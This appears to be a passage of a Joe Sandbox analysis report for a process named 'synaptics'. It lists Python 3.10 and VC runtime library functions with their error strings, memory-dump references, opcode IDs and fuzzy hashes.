                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CriticalFormatSection$ClearCrossData_EnterFromInterpreterLeaveLookupObjectReleaseSemaphoreStringThread_acquire_lock_timedUnicode_
                                                                                                                                                                                                      • String ID: %S does not support cross-interpreter data
                                                                                                                                                                                                      • API String ID: 1573587805-654884339
                                                                                                                                                                                                      • Opcode ID: f3856928068e255b8eff5c4b3e59c46e541cfabf6097901da3b95efed992fd6f
                                                                                                                                                                                                      • Instruction ID: 809c00d4c595d56c04df3133515ed204d3735ee4fa31228016702bb8724fc9ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3856928068e255b8eff5c4b3e59c46e541cfabf6097901da3b95efed992fd6f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7E0C231508118ABDF020A73FC01A843BB49B8236CF481730F81C89EB1EB32D964D781
                                                                                                                                                                                                      Function 6C56DC20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s() %.200s must be %.50s, not %.50s,?,?,?,?), ref: 6C56DC4F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %.200s() %.200s must be %.50s, not %.50s$None
                                                                                                                                                                                                      • API String ID: 376477240-112754523
                                                                                                                                                                                                      • Opcode ID: 7a145e296b4b223f011d11149662fcd641fad38157675fad427e5c6848fa861f
                                                                                                                                                                                                      • Instruction ID: 7eb94d73929790e8f6d7c1a0374b1d6039eeb077340743106ae21bfb980637e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a145e296b4b223f011d11149662fcd641fad38157675fad427e5c6848fa861f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2E0EC7524820CEFCF11DE89DE51C997BA9AB58319B858450FD088FE32C632DD619B61
                                                                                                                                                                                                      Function 6C485EC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\funcobject.c,00000073), ref: 6C485EE7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\funcobject.c, xrefs: 6C485ED6
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C485EDB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\funcobject.c
                                                                                                                                                                                                      • API String ID: 376477240-464478189
                                                                                                                                                                                                      • Opcode ID: b3658bb3c781f3d4537931ebc1bafd201e0e4885af86d4e9d865944931a64f3b
                                                                                                                                                                                                      • Instruction ID: 0aceab56dd31cdb60d19ced902537c7138303ae6ac6fe9e4d5de44f67f522761
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3658bb3c781f3d4537931ebc1bafd201e0e4885af86d4e9d865944931a64f3b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FED02BB270420CDFCA00DBB8DD02E4133F8A745246B004490F10C87E22CB30FD00CBA0
                                                                                                                                                                                                      Function 6C485E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\funcobject.c,00000069), ref: 6C485EA7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\funcobject.c, xrefs: 6C485E96
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C485E9B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\funcobject.c
                                                                                                                                                                                                      • API String ID: 376477240-464478189
                                                                                                                                                                                                      • Opcode ID: c849751cfed5dbe3a7887e84f628d67def51c887828e4800ab27ee8aa6ee289b
                                                                                                                                                                                                      • Instruction ID: 865652abe0e4d3f66d7700028017842350f6dd2e8ff3ac847dcfb8223872a5b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c849751cfed5dbe3a7887e84f628d67def51c887828e4800ab27ee8aa6ee289b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BD05EB274520CEFCA00EBA8DE43E5537F9AB49256B0148A0F11C97E22DB31EC51CBE1
                                                                                                                                                                                                      Function 6C485F40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\funcobject.c,00000087), ref: 6C485F6A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\funcobject.c, xrefs: 6C485F59
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C485F5E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\funcobject.c
                                                                                                                                                                                                      • API String ID: 376477240-464478189
                                                                                                                                                                                                      • Opcode ID: 41fb8975943f14e516f60cae21161804251a2965870d6e6dcdc81c91cad940bc
                                                                                                                                                                                                      • Instruction ID: bc5c63edcb24f4e1067849093bdbd54c6a09a0f35c0cdbffa3f4a256f1cf8b5c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41fb8975943f14e516f60cae21161804251a2965870d6e6dcdc81c91cad940bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28D05BB271020CDFCA00DBA4DD42E5577F8A745255B418450F11C97E23DB31EC118B91
                                                                                                                                                                                                      Function 6C485F00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\funcobject.c,0000007D), ref: 6C485F27
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\funcobject.c, xrefs: 6C485F16
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C485F1B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\funcobject.c
                                                                                                                                                                                                      • API String ID: 376477240-464478189
                                                                                                                                                                                                      • Opcode ID: 70c1982b2a2aedccb38ec000bfbc53ffb1b42d90c193efe74991798d04255006
                                                                                                                                                                                                      • Instruction ID: 58a2e2ce154d83a5688650e5aa3c776b3253bf3ff53b967849e8ef0ed0c44537
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70c1982b2a2aedccb38ec000bfbc53ffb1b42d90c193efe74991798d04255006
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD017B2A15208AFDA00EBA89A42E4537B8AB45246B4544A0F21C97E22DA35E811CBA1
                                                                                                                                                                                                      Function 6C469AF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\classobject.c,0000001C), ref: 6C469B17
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C469B0B
                                                                                                                                                                                                      • D:\a\1\s\Objects\classobject.c, xrefs: 6C469B06
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\classobject.c
                                                                                                                                                                                                      • API String ID: 376477240-2515248907
                                                                                                                                                                                                      • Opcode ID: b3d9f67fb5341bf27aff137f8add553f552065a3ca17fb3c1f8bab8b3a67e47f
                                                                                                                                                                                                      • Instruction ID: e15d669214a1f95eb27ba21b7f9eb79bfbc14375b8a7398ccb7ebb29249fe24b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d9f67fb5341bf27aff137f8add553f552065a3ca17fb3c1f8bab8b3a67e47f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0D02B7231020CDFCA01EBA4DC03D427BF8AB15656B008490F10C87E23CB31EC009B90
                                                                                                                                                                                                      Function 6C469AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\classobject.c,00000012), ref: 6C469AD7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C469ACB
                                                                                                                                                                                                      • D:\a\1\s\Objects\classobject.c, xrefs: 6C469AC6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\classobject.c
                                                                                                                                                                                                      • API String ID: 376477240-2515248907
                                                                                                                                                                                                      • Opcode ID: 4d599368bb23b778991980704b7d0344bcdd5a2c9775c850ae6b0113aac1035d
                                                                                                                                                                                                      • Instruction ID: fa74d10b69fb9dc4a29d7551ebd3aaf8e6682abbcb329af0550f39b50b958de5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d599368bb23b778991980704b7d0344bcdd5a2c9775c850ae6b0113aac1035d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46D0C2723002089BCA01EBA4D903D8237E8AB05246B008490F10C87E23CA31EC10AB90
                                                                                                                                                                                                      Function 6C4C8A20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(must be str, not %.100s,?,6C4E6956), ref: 6C4C8A3A
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • must be str, not %.100s, xrefs: 6C4C8A2F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: must be str, not %.100s
                                                                                                                                                                                                      • API String ID: 4090262012-2503835932
                                                                                                                                                                                                      • Opcode ID: 22697bf984b21dd7cac6b7221c9b7ef46da05d0b8c3e70bc946dd852d2104646
                                                                                                                                                                                                      • Instruction ID: edda83f15959448b1cd7ab70985cb17d1bcf3a4c90a57bb6bc92a850cc8fa773
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22697bf984b21dd7cac6b7221c9b7ef46da05d0b8c3e70bc946dd852d2104646
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19D0C2B8A103009BCF10CA309C00F443B506F8227EB9847A8E82845AF2D737D515A241
                                                                                                                                                                                                      Function 73A87304 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 73A872E3
                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(73A8EF48,73A8EFDC,73A8EF48,00000014,?,73A8EFF8), ref: 73A87327
                                                                                                                                                                                                        • Part of subcall function 73A87550: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,73A87292,?,73A8EFF8), ref: 73A87580
                                                                                                                                                                                                        • Part of subcall function 73A87550: RaiseException.KERNEL32(E06D7363,00000001,00000003,73A87292,?,?,?,73A87292,?,73A8EFF8), ref: 73A875B0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Access violation - no RTTI data!, xrefs: 73A87307
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                      • API String ID: 1667904068-2158758863
                                                                                                                                                                                                      • Opcode ID: 14ae84058cbc77c56e9d72df237be5fe32f11d1f5b7da14842bea246c451c9bf
                                                                                                                                                                                                      • Instruction ID: 18c66ee310558f66ac0023d2b7b0f3a1053c72e92b941122ca6687a189890bb6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14ae84058cbc77c56e9d72df237be5fe32f11d1f5b7da14842bea246c451c9bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DD09E3580420C9ADB1FD6D49607ACD6768D504100F2009539B609B51DB677BD904753
                                                                                                                                                                                                      Function 6C473DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(?), ref: 6C473DBA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
